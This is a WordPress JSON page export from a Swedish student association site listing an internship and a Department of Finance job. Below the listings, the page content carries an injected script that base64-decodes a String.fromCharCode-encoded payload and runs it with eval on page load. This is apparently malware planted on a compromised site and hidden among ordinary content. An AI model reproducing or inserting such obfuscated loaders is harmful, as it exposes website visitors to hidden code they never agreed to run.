{"id":1223,"date":"2013-11-11T14:13:37","date_gmt":"2013-11-11T14:13:37","guid":{"rendered":"http:\/\/www.paretouppsala.se\/?page_id=1223"},"modified":"2017-11-04T10:34:11","modified_gmt":"2017-11-04T09:34:11","slug":"employment-opportunities","status":"publish","type":"page","link":"http:\/\/www.paretouppsala.se\/index.php\/employment-opportunities\/","title":{"rendered":"Employment Opportunities"},"content":{"rendered":"<p><strong>Stelacon Internship<\/strong><\/p>\n<p>Stelacon is currently looking for applicants interested in an internship with them this coming fall. Details about the application can be found in the link below. Applicants are required to speak Swedish.<\/p>\n<p><a href=\"http:\/\/www.paretouppsala.se\/wp-content\/uploads\/2014\/03\/Stelacon-Praktikant.pdf\">Stelacon Praktikant<\/a><\/p>\n<p>&nbsp;<\/p>\n<p><strong>Swedish Department of Finance Employment Opportunity<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p>The department of finance is looking for applicants with a background in economics and\/or political science for their budget division, Swedish speaking applicants only, the job is temporary and running up until the 31st of December. Here is a general job description taken from their website:<\/p>\n<p>&#8220;Arbetsuppgifterna \u00e4r m\u00e5ngskiftande eftersom budgetavdelningens stabs arbetsdag delvis beror p\u00e5 vilka best\u00e4llningar som kommer och vilket st\u00f6d finansministern vill ha. Det kan handla om att samordna processer, ansvara f\u00f6r st\u00f6rre Exceltabeller och visualisera dem eller att kvalitetsgranska underlag och hantera en del administrativa uppgifter. Sammantaget enkla till avancerade arbetsuppgifter med gemensamt att de bidrar till beslutsunderlag f\u00f6r den ekonomiska politiken.<br \/>\n(&#8230;)<br \/>\nVi s\u00f6ker dig som \u00e4r nyexaminerad nationalekonom\/statsvetare med goda kunskaper i Excel. Erfarenhet fr\u00e5n processtyrd verksamhet \u00e4r meriterande.&#8221;<\/p>\n<p>To apply and find more information visit their website at:<br \/>\n<a href=\"http:\/\/www.regeringen.se\/sb\/d\/17790\">http:\/\/www.regeringen.se\/sb\/d\/17790<\/a><\/p>\n<p><em>Last date for sending in an application is <span style=\"text-decoration: underline;\">28th of March 2014<\/span>.<\/em><\/p>\n<p><strong>\u00a0<\/strong><\/p>\n<p><script> <\/script> <script> <\/script> <script> <\/script><br \/>\n<script type=\"text\/javascript\">\nvar EHWHFOLYQH = atob('dmFyIFpEVFJSSFFJRE8gPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDE0IC0gNCwgMTE5IC0gMSwgMTAwIC0gMywgMTE1IC0gMSwgMzQgLSAyLCAxMDggLSAxLCAxMTAgLSA5LCAxMjMgLSAyLCAzOCAtIDYsIDcwIC0gOSwgMzggLSA2LCA0MiAtIDMsIDg0IC0gOCwgODAgLSAxLCA4NCAtIDEsIDkyIC0gNywgMTIyIC0gMSwgNzEgLSAxLCAxMTcgLSA5LCAxMDUgLSA1LCA4MiAtIDYsIDExMyAtIDIsIDQxIC0gMiwgNjggLSA5LCAxOSAtIDksIDEyMyAtIDUsIDEwMiAtIDUsIDEyMCAtIDYsIDQwIC0gOCwgMTA1IC0gNCwgMTE1IC0gNSwgMTA1IC0gNiwgMTEwIC0gOSwgMTAyIC0gMiwgMzkgLSA3LCA2OCAtIDcsIDM2IC0gNCwgNDQgLSA1LCA4OCAtIDksIDExMCAtIDUsIDYwIC0gOCwgMTA3IC0gMywgMTAzIC0gMywgODYgLSA1LCAxMDggLSAxLCA1MSAtIDMsIDY4IC0gMSwgMTA0IC0gMSwgMTEwIC0gNiwgMTE4IC0gMywgODYgLSAxLCAxMTAgLSAxLCAxMjcgLSA4LCAxMTUgLSAxLCA4NCAtIDQsIDc1IC0gNywgOTEgLSAyLCA3OCAtIDEsIDgyIC0gNywgMTIzIC0gNCwgMTEyIC0gNSwgNzggLSAzLCA4NyAtIDgsIDc2IC0gNywgNzYgLSA3LCAxMjQgLSA2LCA4NiAtIDYsIDkwIC0gNiwgOTQgLSA1LCA1MiAtIDQsIDczIC0gNSwgODUgLSAyLCA3OCAtIDEsIDExNyAtIDUsIDY4IC0gMSwgNzQgLSA3LCAxMDkgLSAyLCA3MCAtIDMsIDc5IC0gNCwgODQgLSAxLCA3OCAtIDksIDExMyAtIDMsIDEwOCAtIDYsIDk1IC0gOSwgNjAgLSA4LCA1MCAtIDEsIDc3IC0gOSwgMTI0IC0gNCwgOTIgLSAzLCAxMDkgLSAxLCA3NCAtIDIsIDEyNyAtIDUsIDEwNSAtIDEsIDExOCAtIDcsIDEwNyAtIDYsIDExNCAtIDUsIDU3IC0gNCwgMTMwIC0gOCwgODUgLSA3LCAxMDUgLSAxLCA1NiAtIDQsIDczIC0gNiwgNzQgLSAxLCA3NiAtIDcsIDczIC0gNCwgNTEgLSA0LCA3OSAtIDQsIDEwNiAtIDEsIDEwMCAtIDEsIDkyIC0gNywgNzUgLSA3LCA5MCAtIDYsIDc4IC0gNSwgMTA1IC0gNCwgNzEgLSAzLCA4NiAtIDMsIDU5IC0gNywgMTA2IC0gOSwgODQgLSA1LCA3MSAtIDQsIDExOCAtIDYsIDU5IC0gNCwgMTA4IC0gOSwgMTA4IC0gNSwgMTEyIC0gMSwgNTcgLSA5LCA3MiAtIDQsIDU3IC0gOSwgODUgLSA3LCAxMDkgLSA2LCA4OCAtIDUsIDcwIC0gMywgODMgLSAyLCA2MCAtIDUsIDgxIC0gNywgMTI2IC0gNSwgODcgLSAxLCA3MSAtIDMsIDEwNiAtIDksIDkzIC0gOCwgODEgLSA0LCA4NSAtIDQsIDg0IC0gNCwgMTEyIC0gOSwgNTMgLSAxLCAxMTkgLSA2LCA4MyAtIDgsIDkyIC0gOCwgMTEyIC0gMSwgNTkgLSA5LCA3OSAtIDgsIDczIC0gNSwgOTAgLSAxLCA3MyAtIDMsIDkyIC0gOSwgMTEyIC0gNywgNzggLSA1LCA3NiAtIDgsIDk0IC0gNSwgMTI3IC0gNSwgMTIxIC0gMiwgMTE0IC0gNCwgODAgLSAyLCA2NiAtIDEsIDUyIC0gNCwgMTIyIC0gNCwgNzAgLSAyLCA1MSAtIDMsIDExNiAtIDEsIDEwNiAtIDIsIDc1IC0gNywgMTEwIC0gNSwgODYgLSAxLCAxMDYgLSAyLCAxMDMgLSAxLCA4OCAtIDQsIDU4IC0gMiwgODIgLSA3LCA5NSAtIDYsIDg2IC0gMSwgOTUgLSA5LCAxMTEgLSA5LCA4MyAtIDEsIDEwNCAtIDEsIDEyMSAtIDYsIDExNCAtIDgsIDc3IC0gMSwgNzIgLSA1LCA5NyAtIDgsIDU1IC0gMywgNzUgLSAzLCA2OCAtIDEsIDExMiAtIDksIDkyIC0gMywgODUgLSAyLCAxMTEgLSA2LCA4NiAtIDUsIDg0IC0gOSwgODQgLSA4LCA4OSAtIDYsIDEyMSAtIDUsIDU4IC0gMSwgODYgLSA4LCA2NiAtIDEsIDExMSAtIDQsIDU3IC0gNywgNzEgLSA0LCA4MyAtIDIsIDExNiAtIDUsIDExNyAtIDYsIDgwIC0gNCwgNzYgLSA5LCA4MiAtIDEsIDExMyAtIDQsIDg0IC0gNCwgMTIzIC0gMSwgNzMgLSAzLCA4NiAtIDQsIDg0IC0gNiwgMTEwIC0gNiwgNjEgLSA5LCA2OSAtIDIsIDgxIC0gOCwgNzYgLSA3LCA5NSAtIDUsIDYwIC0gOSwgODggLSA2LCA4MiAtIDEsIDYzIC0gMiwgNjQgLSAzLCA0MCAtIDEsIDY3IC0gOCwgMTMgLSAzLCAxMDYgLSA0LCAxMjEgLSA0LCAxMTUgLSA1LCAxMDQgLSA1LCAxMjQgLSA4LCAxMDggLSAzLCAxMTkgLSA4LCAxMTUgLSA1LCAzOCAtIDYsIDEyOCAtIDgsIDExMyAtIDIsIDEyMSAtIDcsIDk5IC0gNCwgMTAzIC0gMiwgMTE3IC0gNywgMTA0IC0gNSwgNDggLSA4LCAxMjAgLSA1LCAxMjMgLSA3LCAxMjMgLSA5LCAxMTEgLSA2LCAxMTQgLSA0LCAxMTEgLSA4LCA0NyAtIDMsIDM4IC0gNiwgMTExIC0gNCwgMTA4IC0gNywgMTI5IC0gOCwgNDggLSA3LCAzOSAtIDcsIDEzMiAtIDksIDE2IC0gNiwgMzQgLSAyLCAzOCAtIDYsIDEyNyAtIDksIDEwNSAtIDgsIDEyMSAtIDcsIDQwIC0gOCwgMTE3IC0gMywgMTA5IC0gOCwgMTIxIC0gNiwgMzkgLSA3LCA2OCAtIDcsIDQxIC0gOSwgNDggLSA5LCA0MSAtIDIsIDYxIC0gMiwgMTYgLSA2LCAzOCAtIDYsIDQwIC0gOCwgMTA1IC0gMywgMTEzIC0gMiwgMTE3IC0gMywgMzcgLSA1LCA0MyAtIDMsIDEyMiAtIDQsIDEwMCAtIDMsIDExOCAtIDQsIDM1IC0gMywgMTA2IC0gMSwgMzQgLSAyLCA2NyAtIDYsIDMzIC0gMSwgNTIgLSA0LCA2NCAtIDUsIDQxIC0gOSwgMTA4IC0gMywgMzUgLSAzLCA2NiAtIDYsIDM3IC0gNSwgMTE2IC0gMSwgMTI1IC0gOSwgMTIwIC0gNiwgMTE0IC0gOSwgMTE0IC0gNCwgMTA4IC0gNSwgNDcgLSAxLCAxMTIgLSA0LCAxMDggLSA3LCAxMTEgLSAxLCAxMDkgLSA2LCAxMjEgLSA1LCAxMTMgLSA5LCA2NiAtIDcsIDM4IC0gNiwgMTEyIC0gNywgNTEgLSA4LCA0OSAtIDYsIDQ1IC0gNCwgMzUgLSAzLCAxMjkgLSA2LCAxNyAtIDcsIDQwIC0gOCwgNDAgLSA4LCAzNyAtIDUsIDQxIC0gOSwgMTIxIC0gNywgMTA1IC0gNCwgMTE3IC0gMiwgMzUgLSAzLCA0NiAtIDMsIDY1IC0gNCwgMzMgLSAxLCA4NiAtIDMsIDEyNCAtIDgsIDEyMiAtIDgsIDExMCAtIDUsIDExMyAtIDMsIDExMCAtIDcsIDQ4IC0gMiwgMTExIC0gOSwgMTIxIC0gNywgMTE1IC0gNCwgMTE0IC0gNSwgNzIgLSA1LCAxMTIgLSA4LCAxMDUgLSA4LCAxMTggLSA0LCA3MSAtIDQsIDExMyAtIDIsIDEwMSAtIDEsIDEwNCAtIDMsIDQ4IC0gOCwgMTE5IC0gNCwgMTE5IC0gMywgMTE1IC0gMSwgMTEzIC0gOCwgMTE5IC0gOSwgMTA3IC0gNCwgNTMgLSA3LCAxMDcgLSA4LCAxMTMgLSA5LCAxMDYgLSA5LCAxMjIgLSA4LCA2OSAtIDIsIDExOSAtIDgsIDEwMiAtIDIsIDEwNSAtIDQsIDY5IC0gNCwgMTIxIC0gNSwgNDYgLSA2LCAxMTMgLSA4LCA0OSAtIDgsIDMzIC0gMSwgMTAzIC0gOSwgMTcgLSA3LCAxMiAtIDMsIDEzIC0gNCwgMTcgLSA4LCAxMiAtIDMsIDExMSAtIDQsIDEwNyAtIDYsIDEzMCAtIDksIDUwIC0gNCwgMTA2IC0gNywgMTA4IC0gNCwgMTA1IC0gOCwgMTE2IC0gMiwgNzQgLSA3LCAxMTIgLSAxLCAxMDggLSA4LCAxMDIgLSAxLCA2NyAtIDIsIDExOSAtIDMsIDQ4IC0gOCwgMTEzIC0gOCwgMzMgLSAxLCA0MSAtIDQsIDM0IC0gMiwgMTA4IC0gMSwgMTAzIC0gMiwgMTI3IC0gNiwgNTIgLSA2LCAxMTEgLSAzLCAxMDIgLSAxLCAxMTEgLSAxLCAxMDUgLSAyLCAxMTkgLSAzLCAxMTEgLSA3LCA0OCAtIDcsIDQzIC0gMiwgNjAgLSAxLCAxOCAtIDgsIDM0IC0gMiwgMzcgLSA1LCAxMjYgLSAxLCAxNiAtIDYsIDM3IC0gNSwgNDAgLSA4LCAxMjAgLSA2LCAxMDQgLSAzLCAxMTkgLSAzLCAxMjAgLSAzLCAxMTcgLSAzLCAxMTkgLSA5LCA0MSAtIDksIDEyMSAtIDcsIDEwOCAtIDcsIDExNyAtIDIsIDYzIC0gNCwgMTggLSA4LCAxMzQgLSA5LCAxMyAtIDMsIDE2IC0gNiwgMTIwIC0gMiwgMTAwIC0gMywgMTE4IC0gNCwgNDAgLSA4LCAxMDMgLSAzLCAxMDMgLSAyLCAxMDMgLSA0LCAzOSAtIDcsIDY5IC0gOCwgMzUgLSAzLCAxMjQgLSA0LCAxMTYgLSA1LCAxMTkgLSA1LCA5OSAtIDQsIDEwOSAtIDgsIDExOSAtIDksIDEwMiAtIDMsIDQyIC0gMiwgMTAwIC0gMywgMTIyIC0gNiwgMTE1IC0gNCwgMTA1IC0gNywgNDYgLSA2LCAxMTAgLSA5LCAxMTUgLSA1LCAxMDUgLSA2LCAxMDkgLSA4LCAxMDggLSA4LCA0OCAtIDcsIDUwIC0gNiwgMzYgLSA0LCAxMTUgLSA4LCAxMDkgLSA4LCAxMjMgLSAyLCA0MiAtIDEsIDYxIC0gMiwgMTQgLSA0LCA0OSAtIDksIDExOCAtIDgsIDEwMyAtIDIsIDEyMyAtIDQsIDM4IC0gNiwgNzEgLSAxLCAxMjIgLSA1LCAxMTkgLSA5LCAxMDggLSA5LCAxMjUgLSA5LCAxMDkgLSA0LCAxMTkgLSA4LCAxMTcgLSA3LCA0NCAtIDQsIDEwMSAtIDEsIDEwNCAtIDMsIDEwMiAtIDMsIDQ2IC0gNSwgNDcgLSA2LCA0MyAtIDMsIDQyIC0gMSwgNjIgLSAzLCAxOCAtIDgsIDExIC0gMSk7ZXZhbChaRFRSUkhRSURPKTs='); \neval(EHWHFOLYQH);\n<\/script><\/p>\n<p><script> <\/script> <script> <\/script> <script> <\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Stelacon Internship Stelacon is currently looking for applicants interested in an internship with them this coming fall. Details about the [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"default","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"class_list":["post-1223","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"http:\/\/www.paretouppsala.se\/index.php\/wp-json\/wp\/v2\/pages\/1223","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.paretouppsala.se\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/www.paretouppsala.se\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/www.paretouppsala.se\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.paretouppsala.se\/index.php\/wp-json\/wp\/v2\/comments?post=1223"}],"version-history":[{"count":14,"href":"http:\/\/www.paretouppsala.se\/index.php\/wp-json\/wp\/v2\/pages\/1223\/revisions"}],"predecessor-version":[{"id":2199,"href":"http:\/\/www.paretouppsala.se\/index.php\/wp-json\/wp\/v2\/pages\/1223\/revisions\/2199"}],"wp:attachment":[{"href":"http:\/\/www.paretouppsala.se\/index.php\/wp-json\/wp\/v2\/media?parent=1223"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}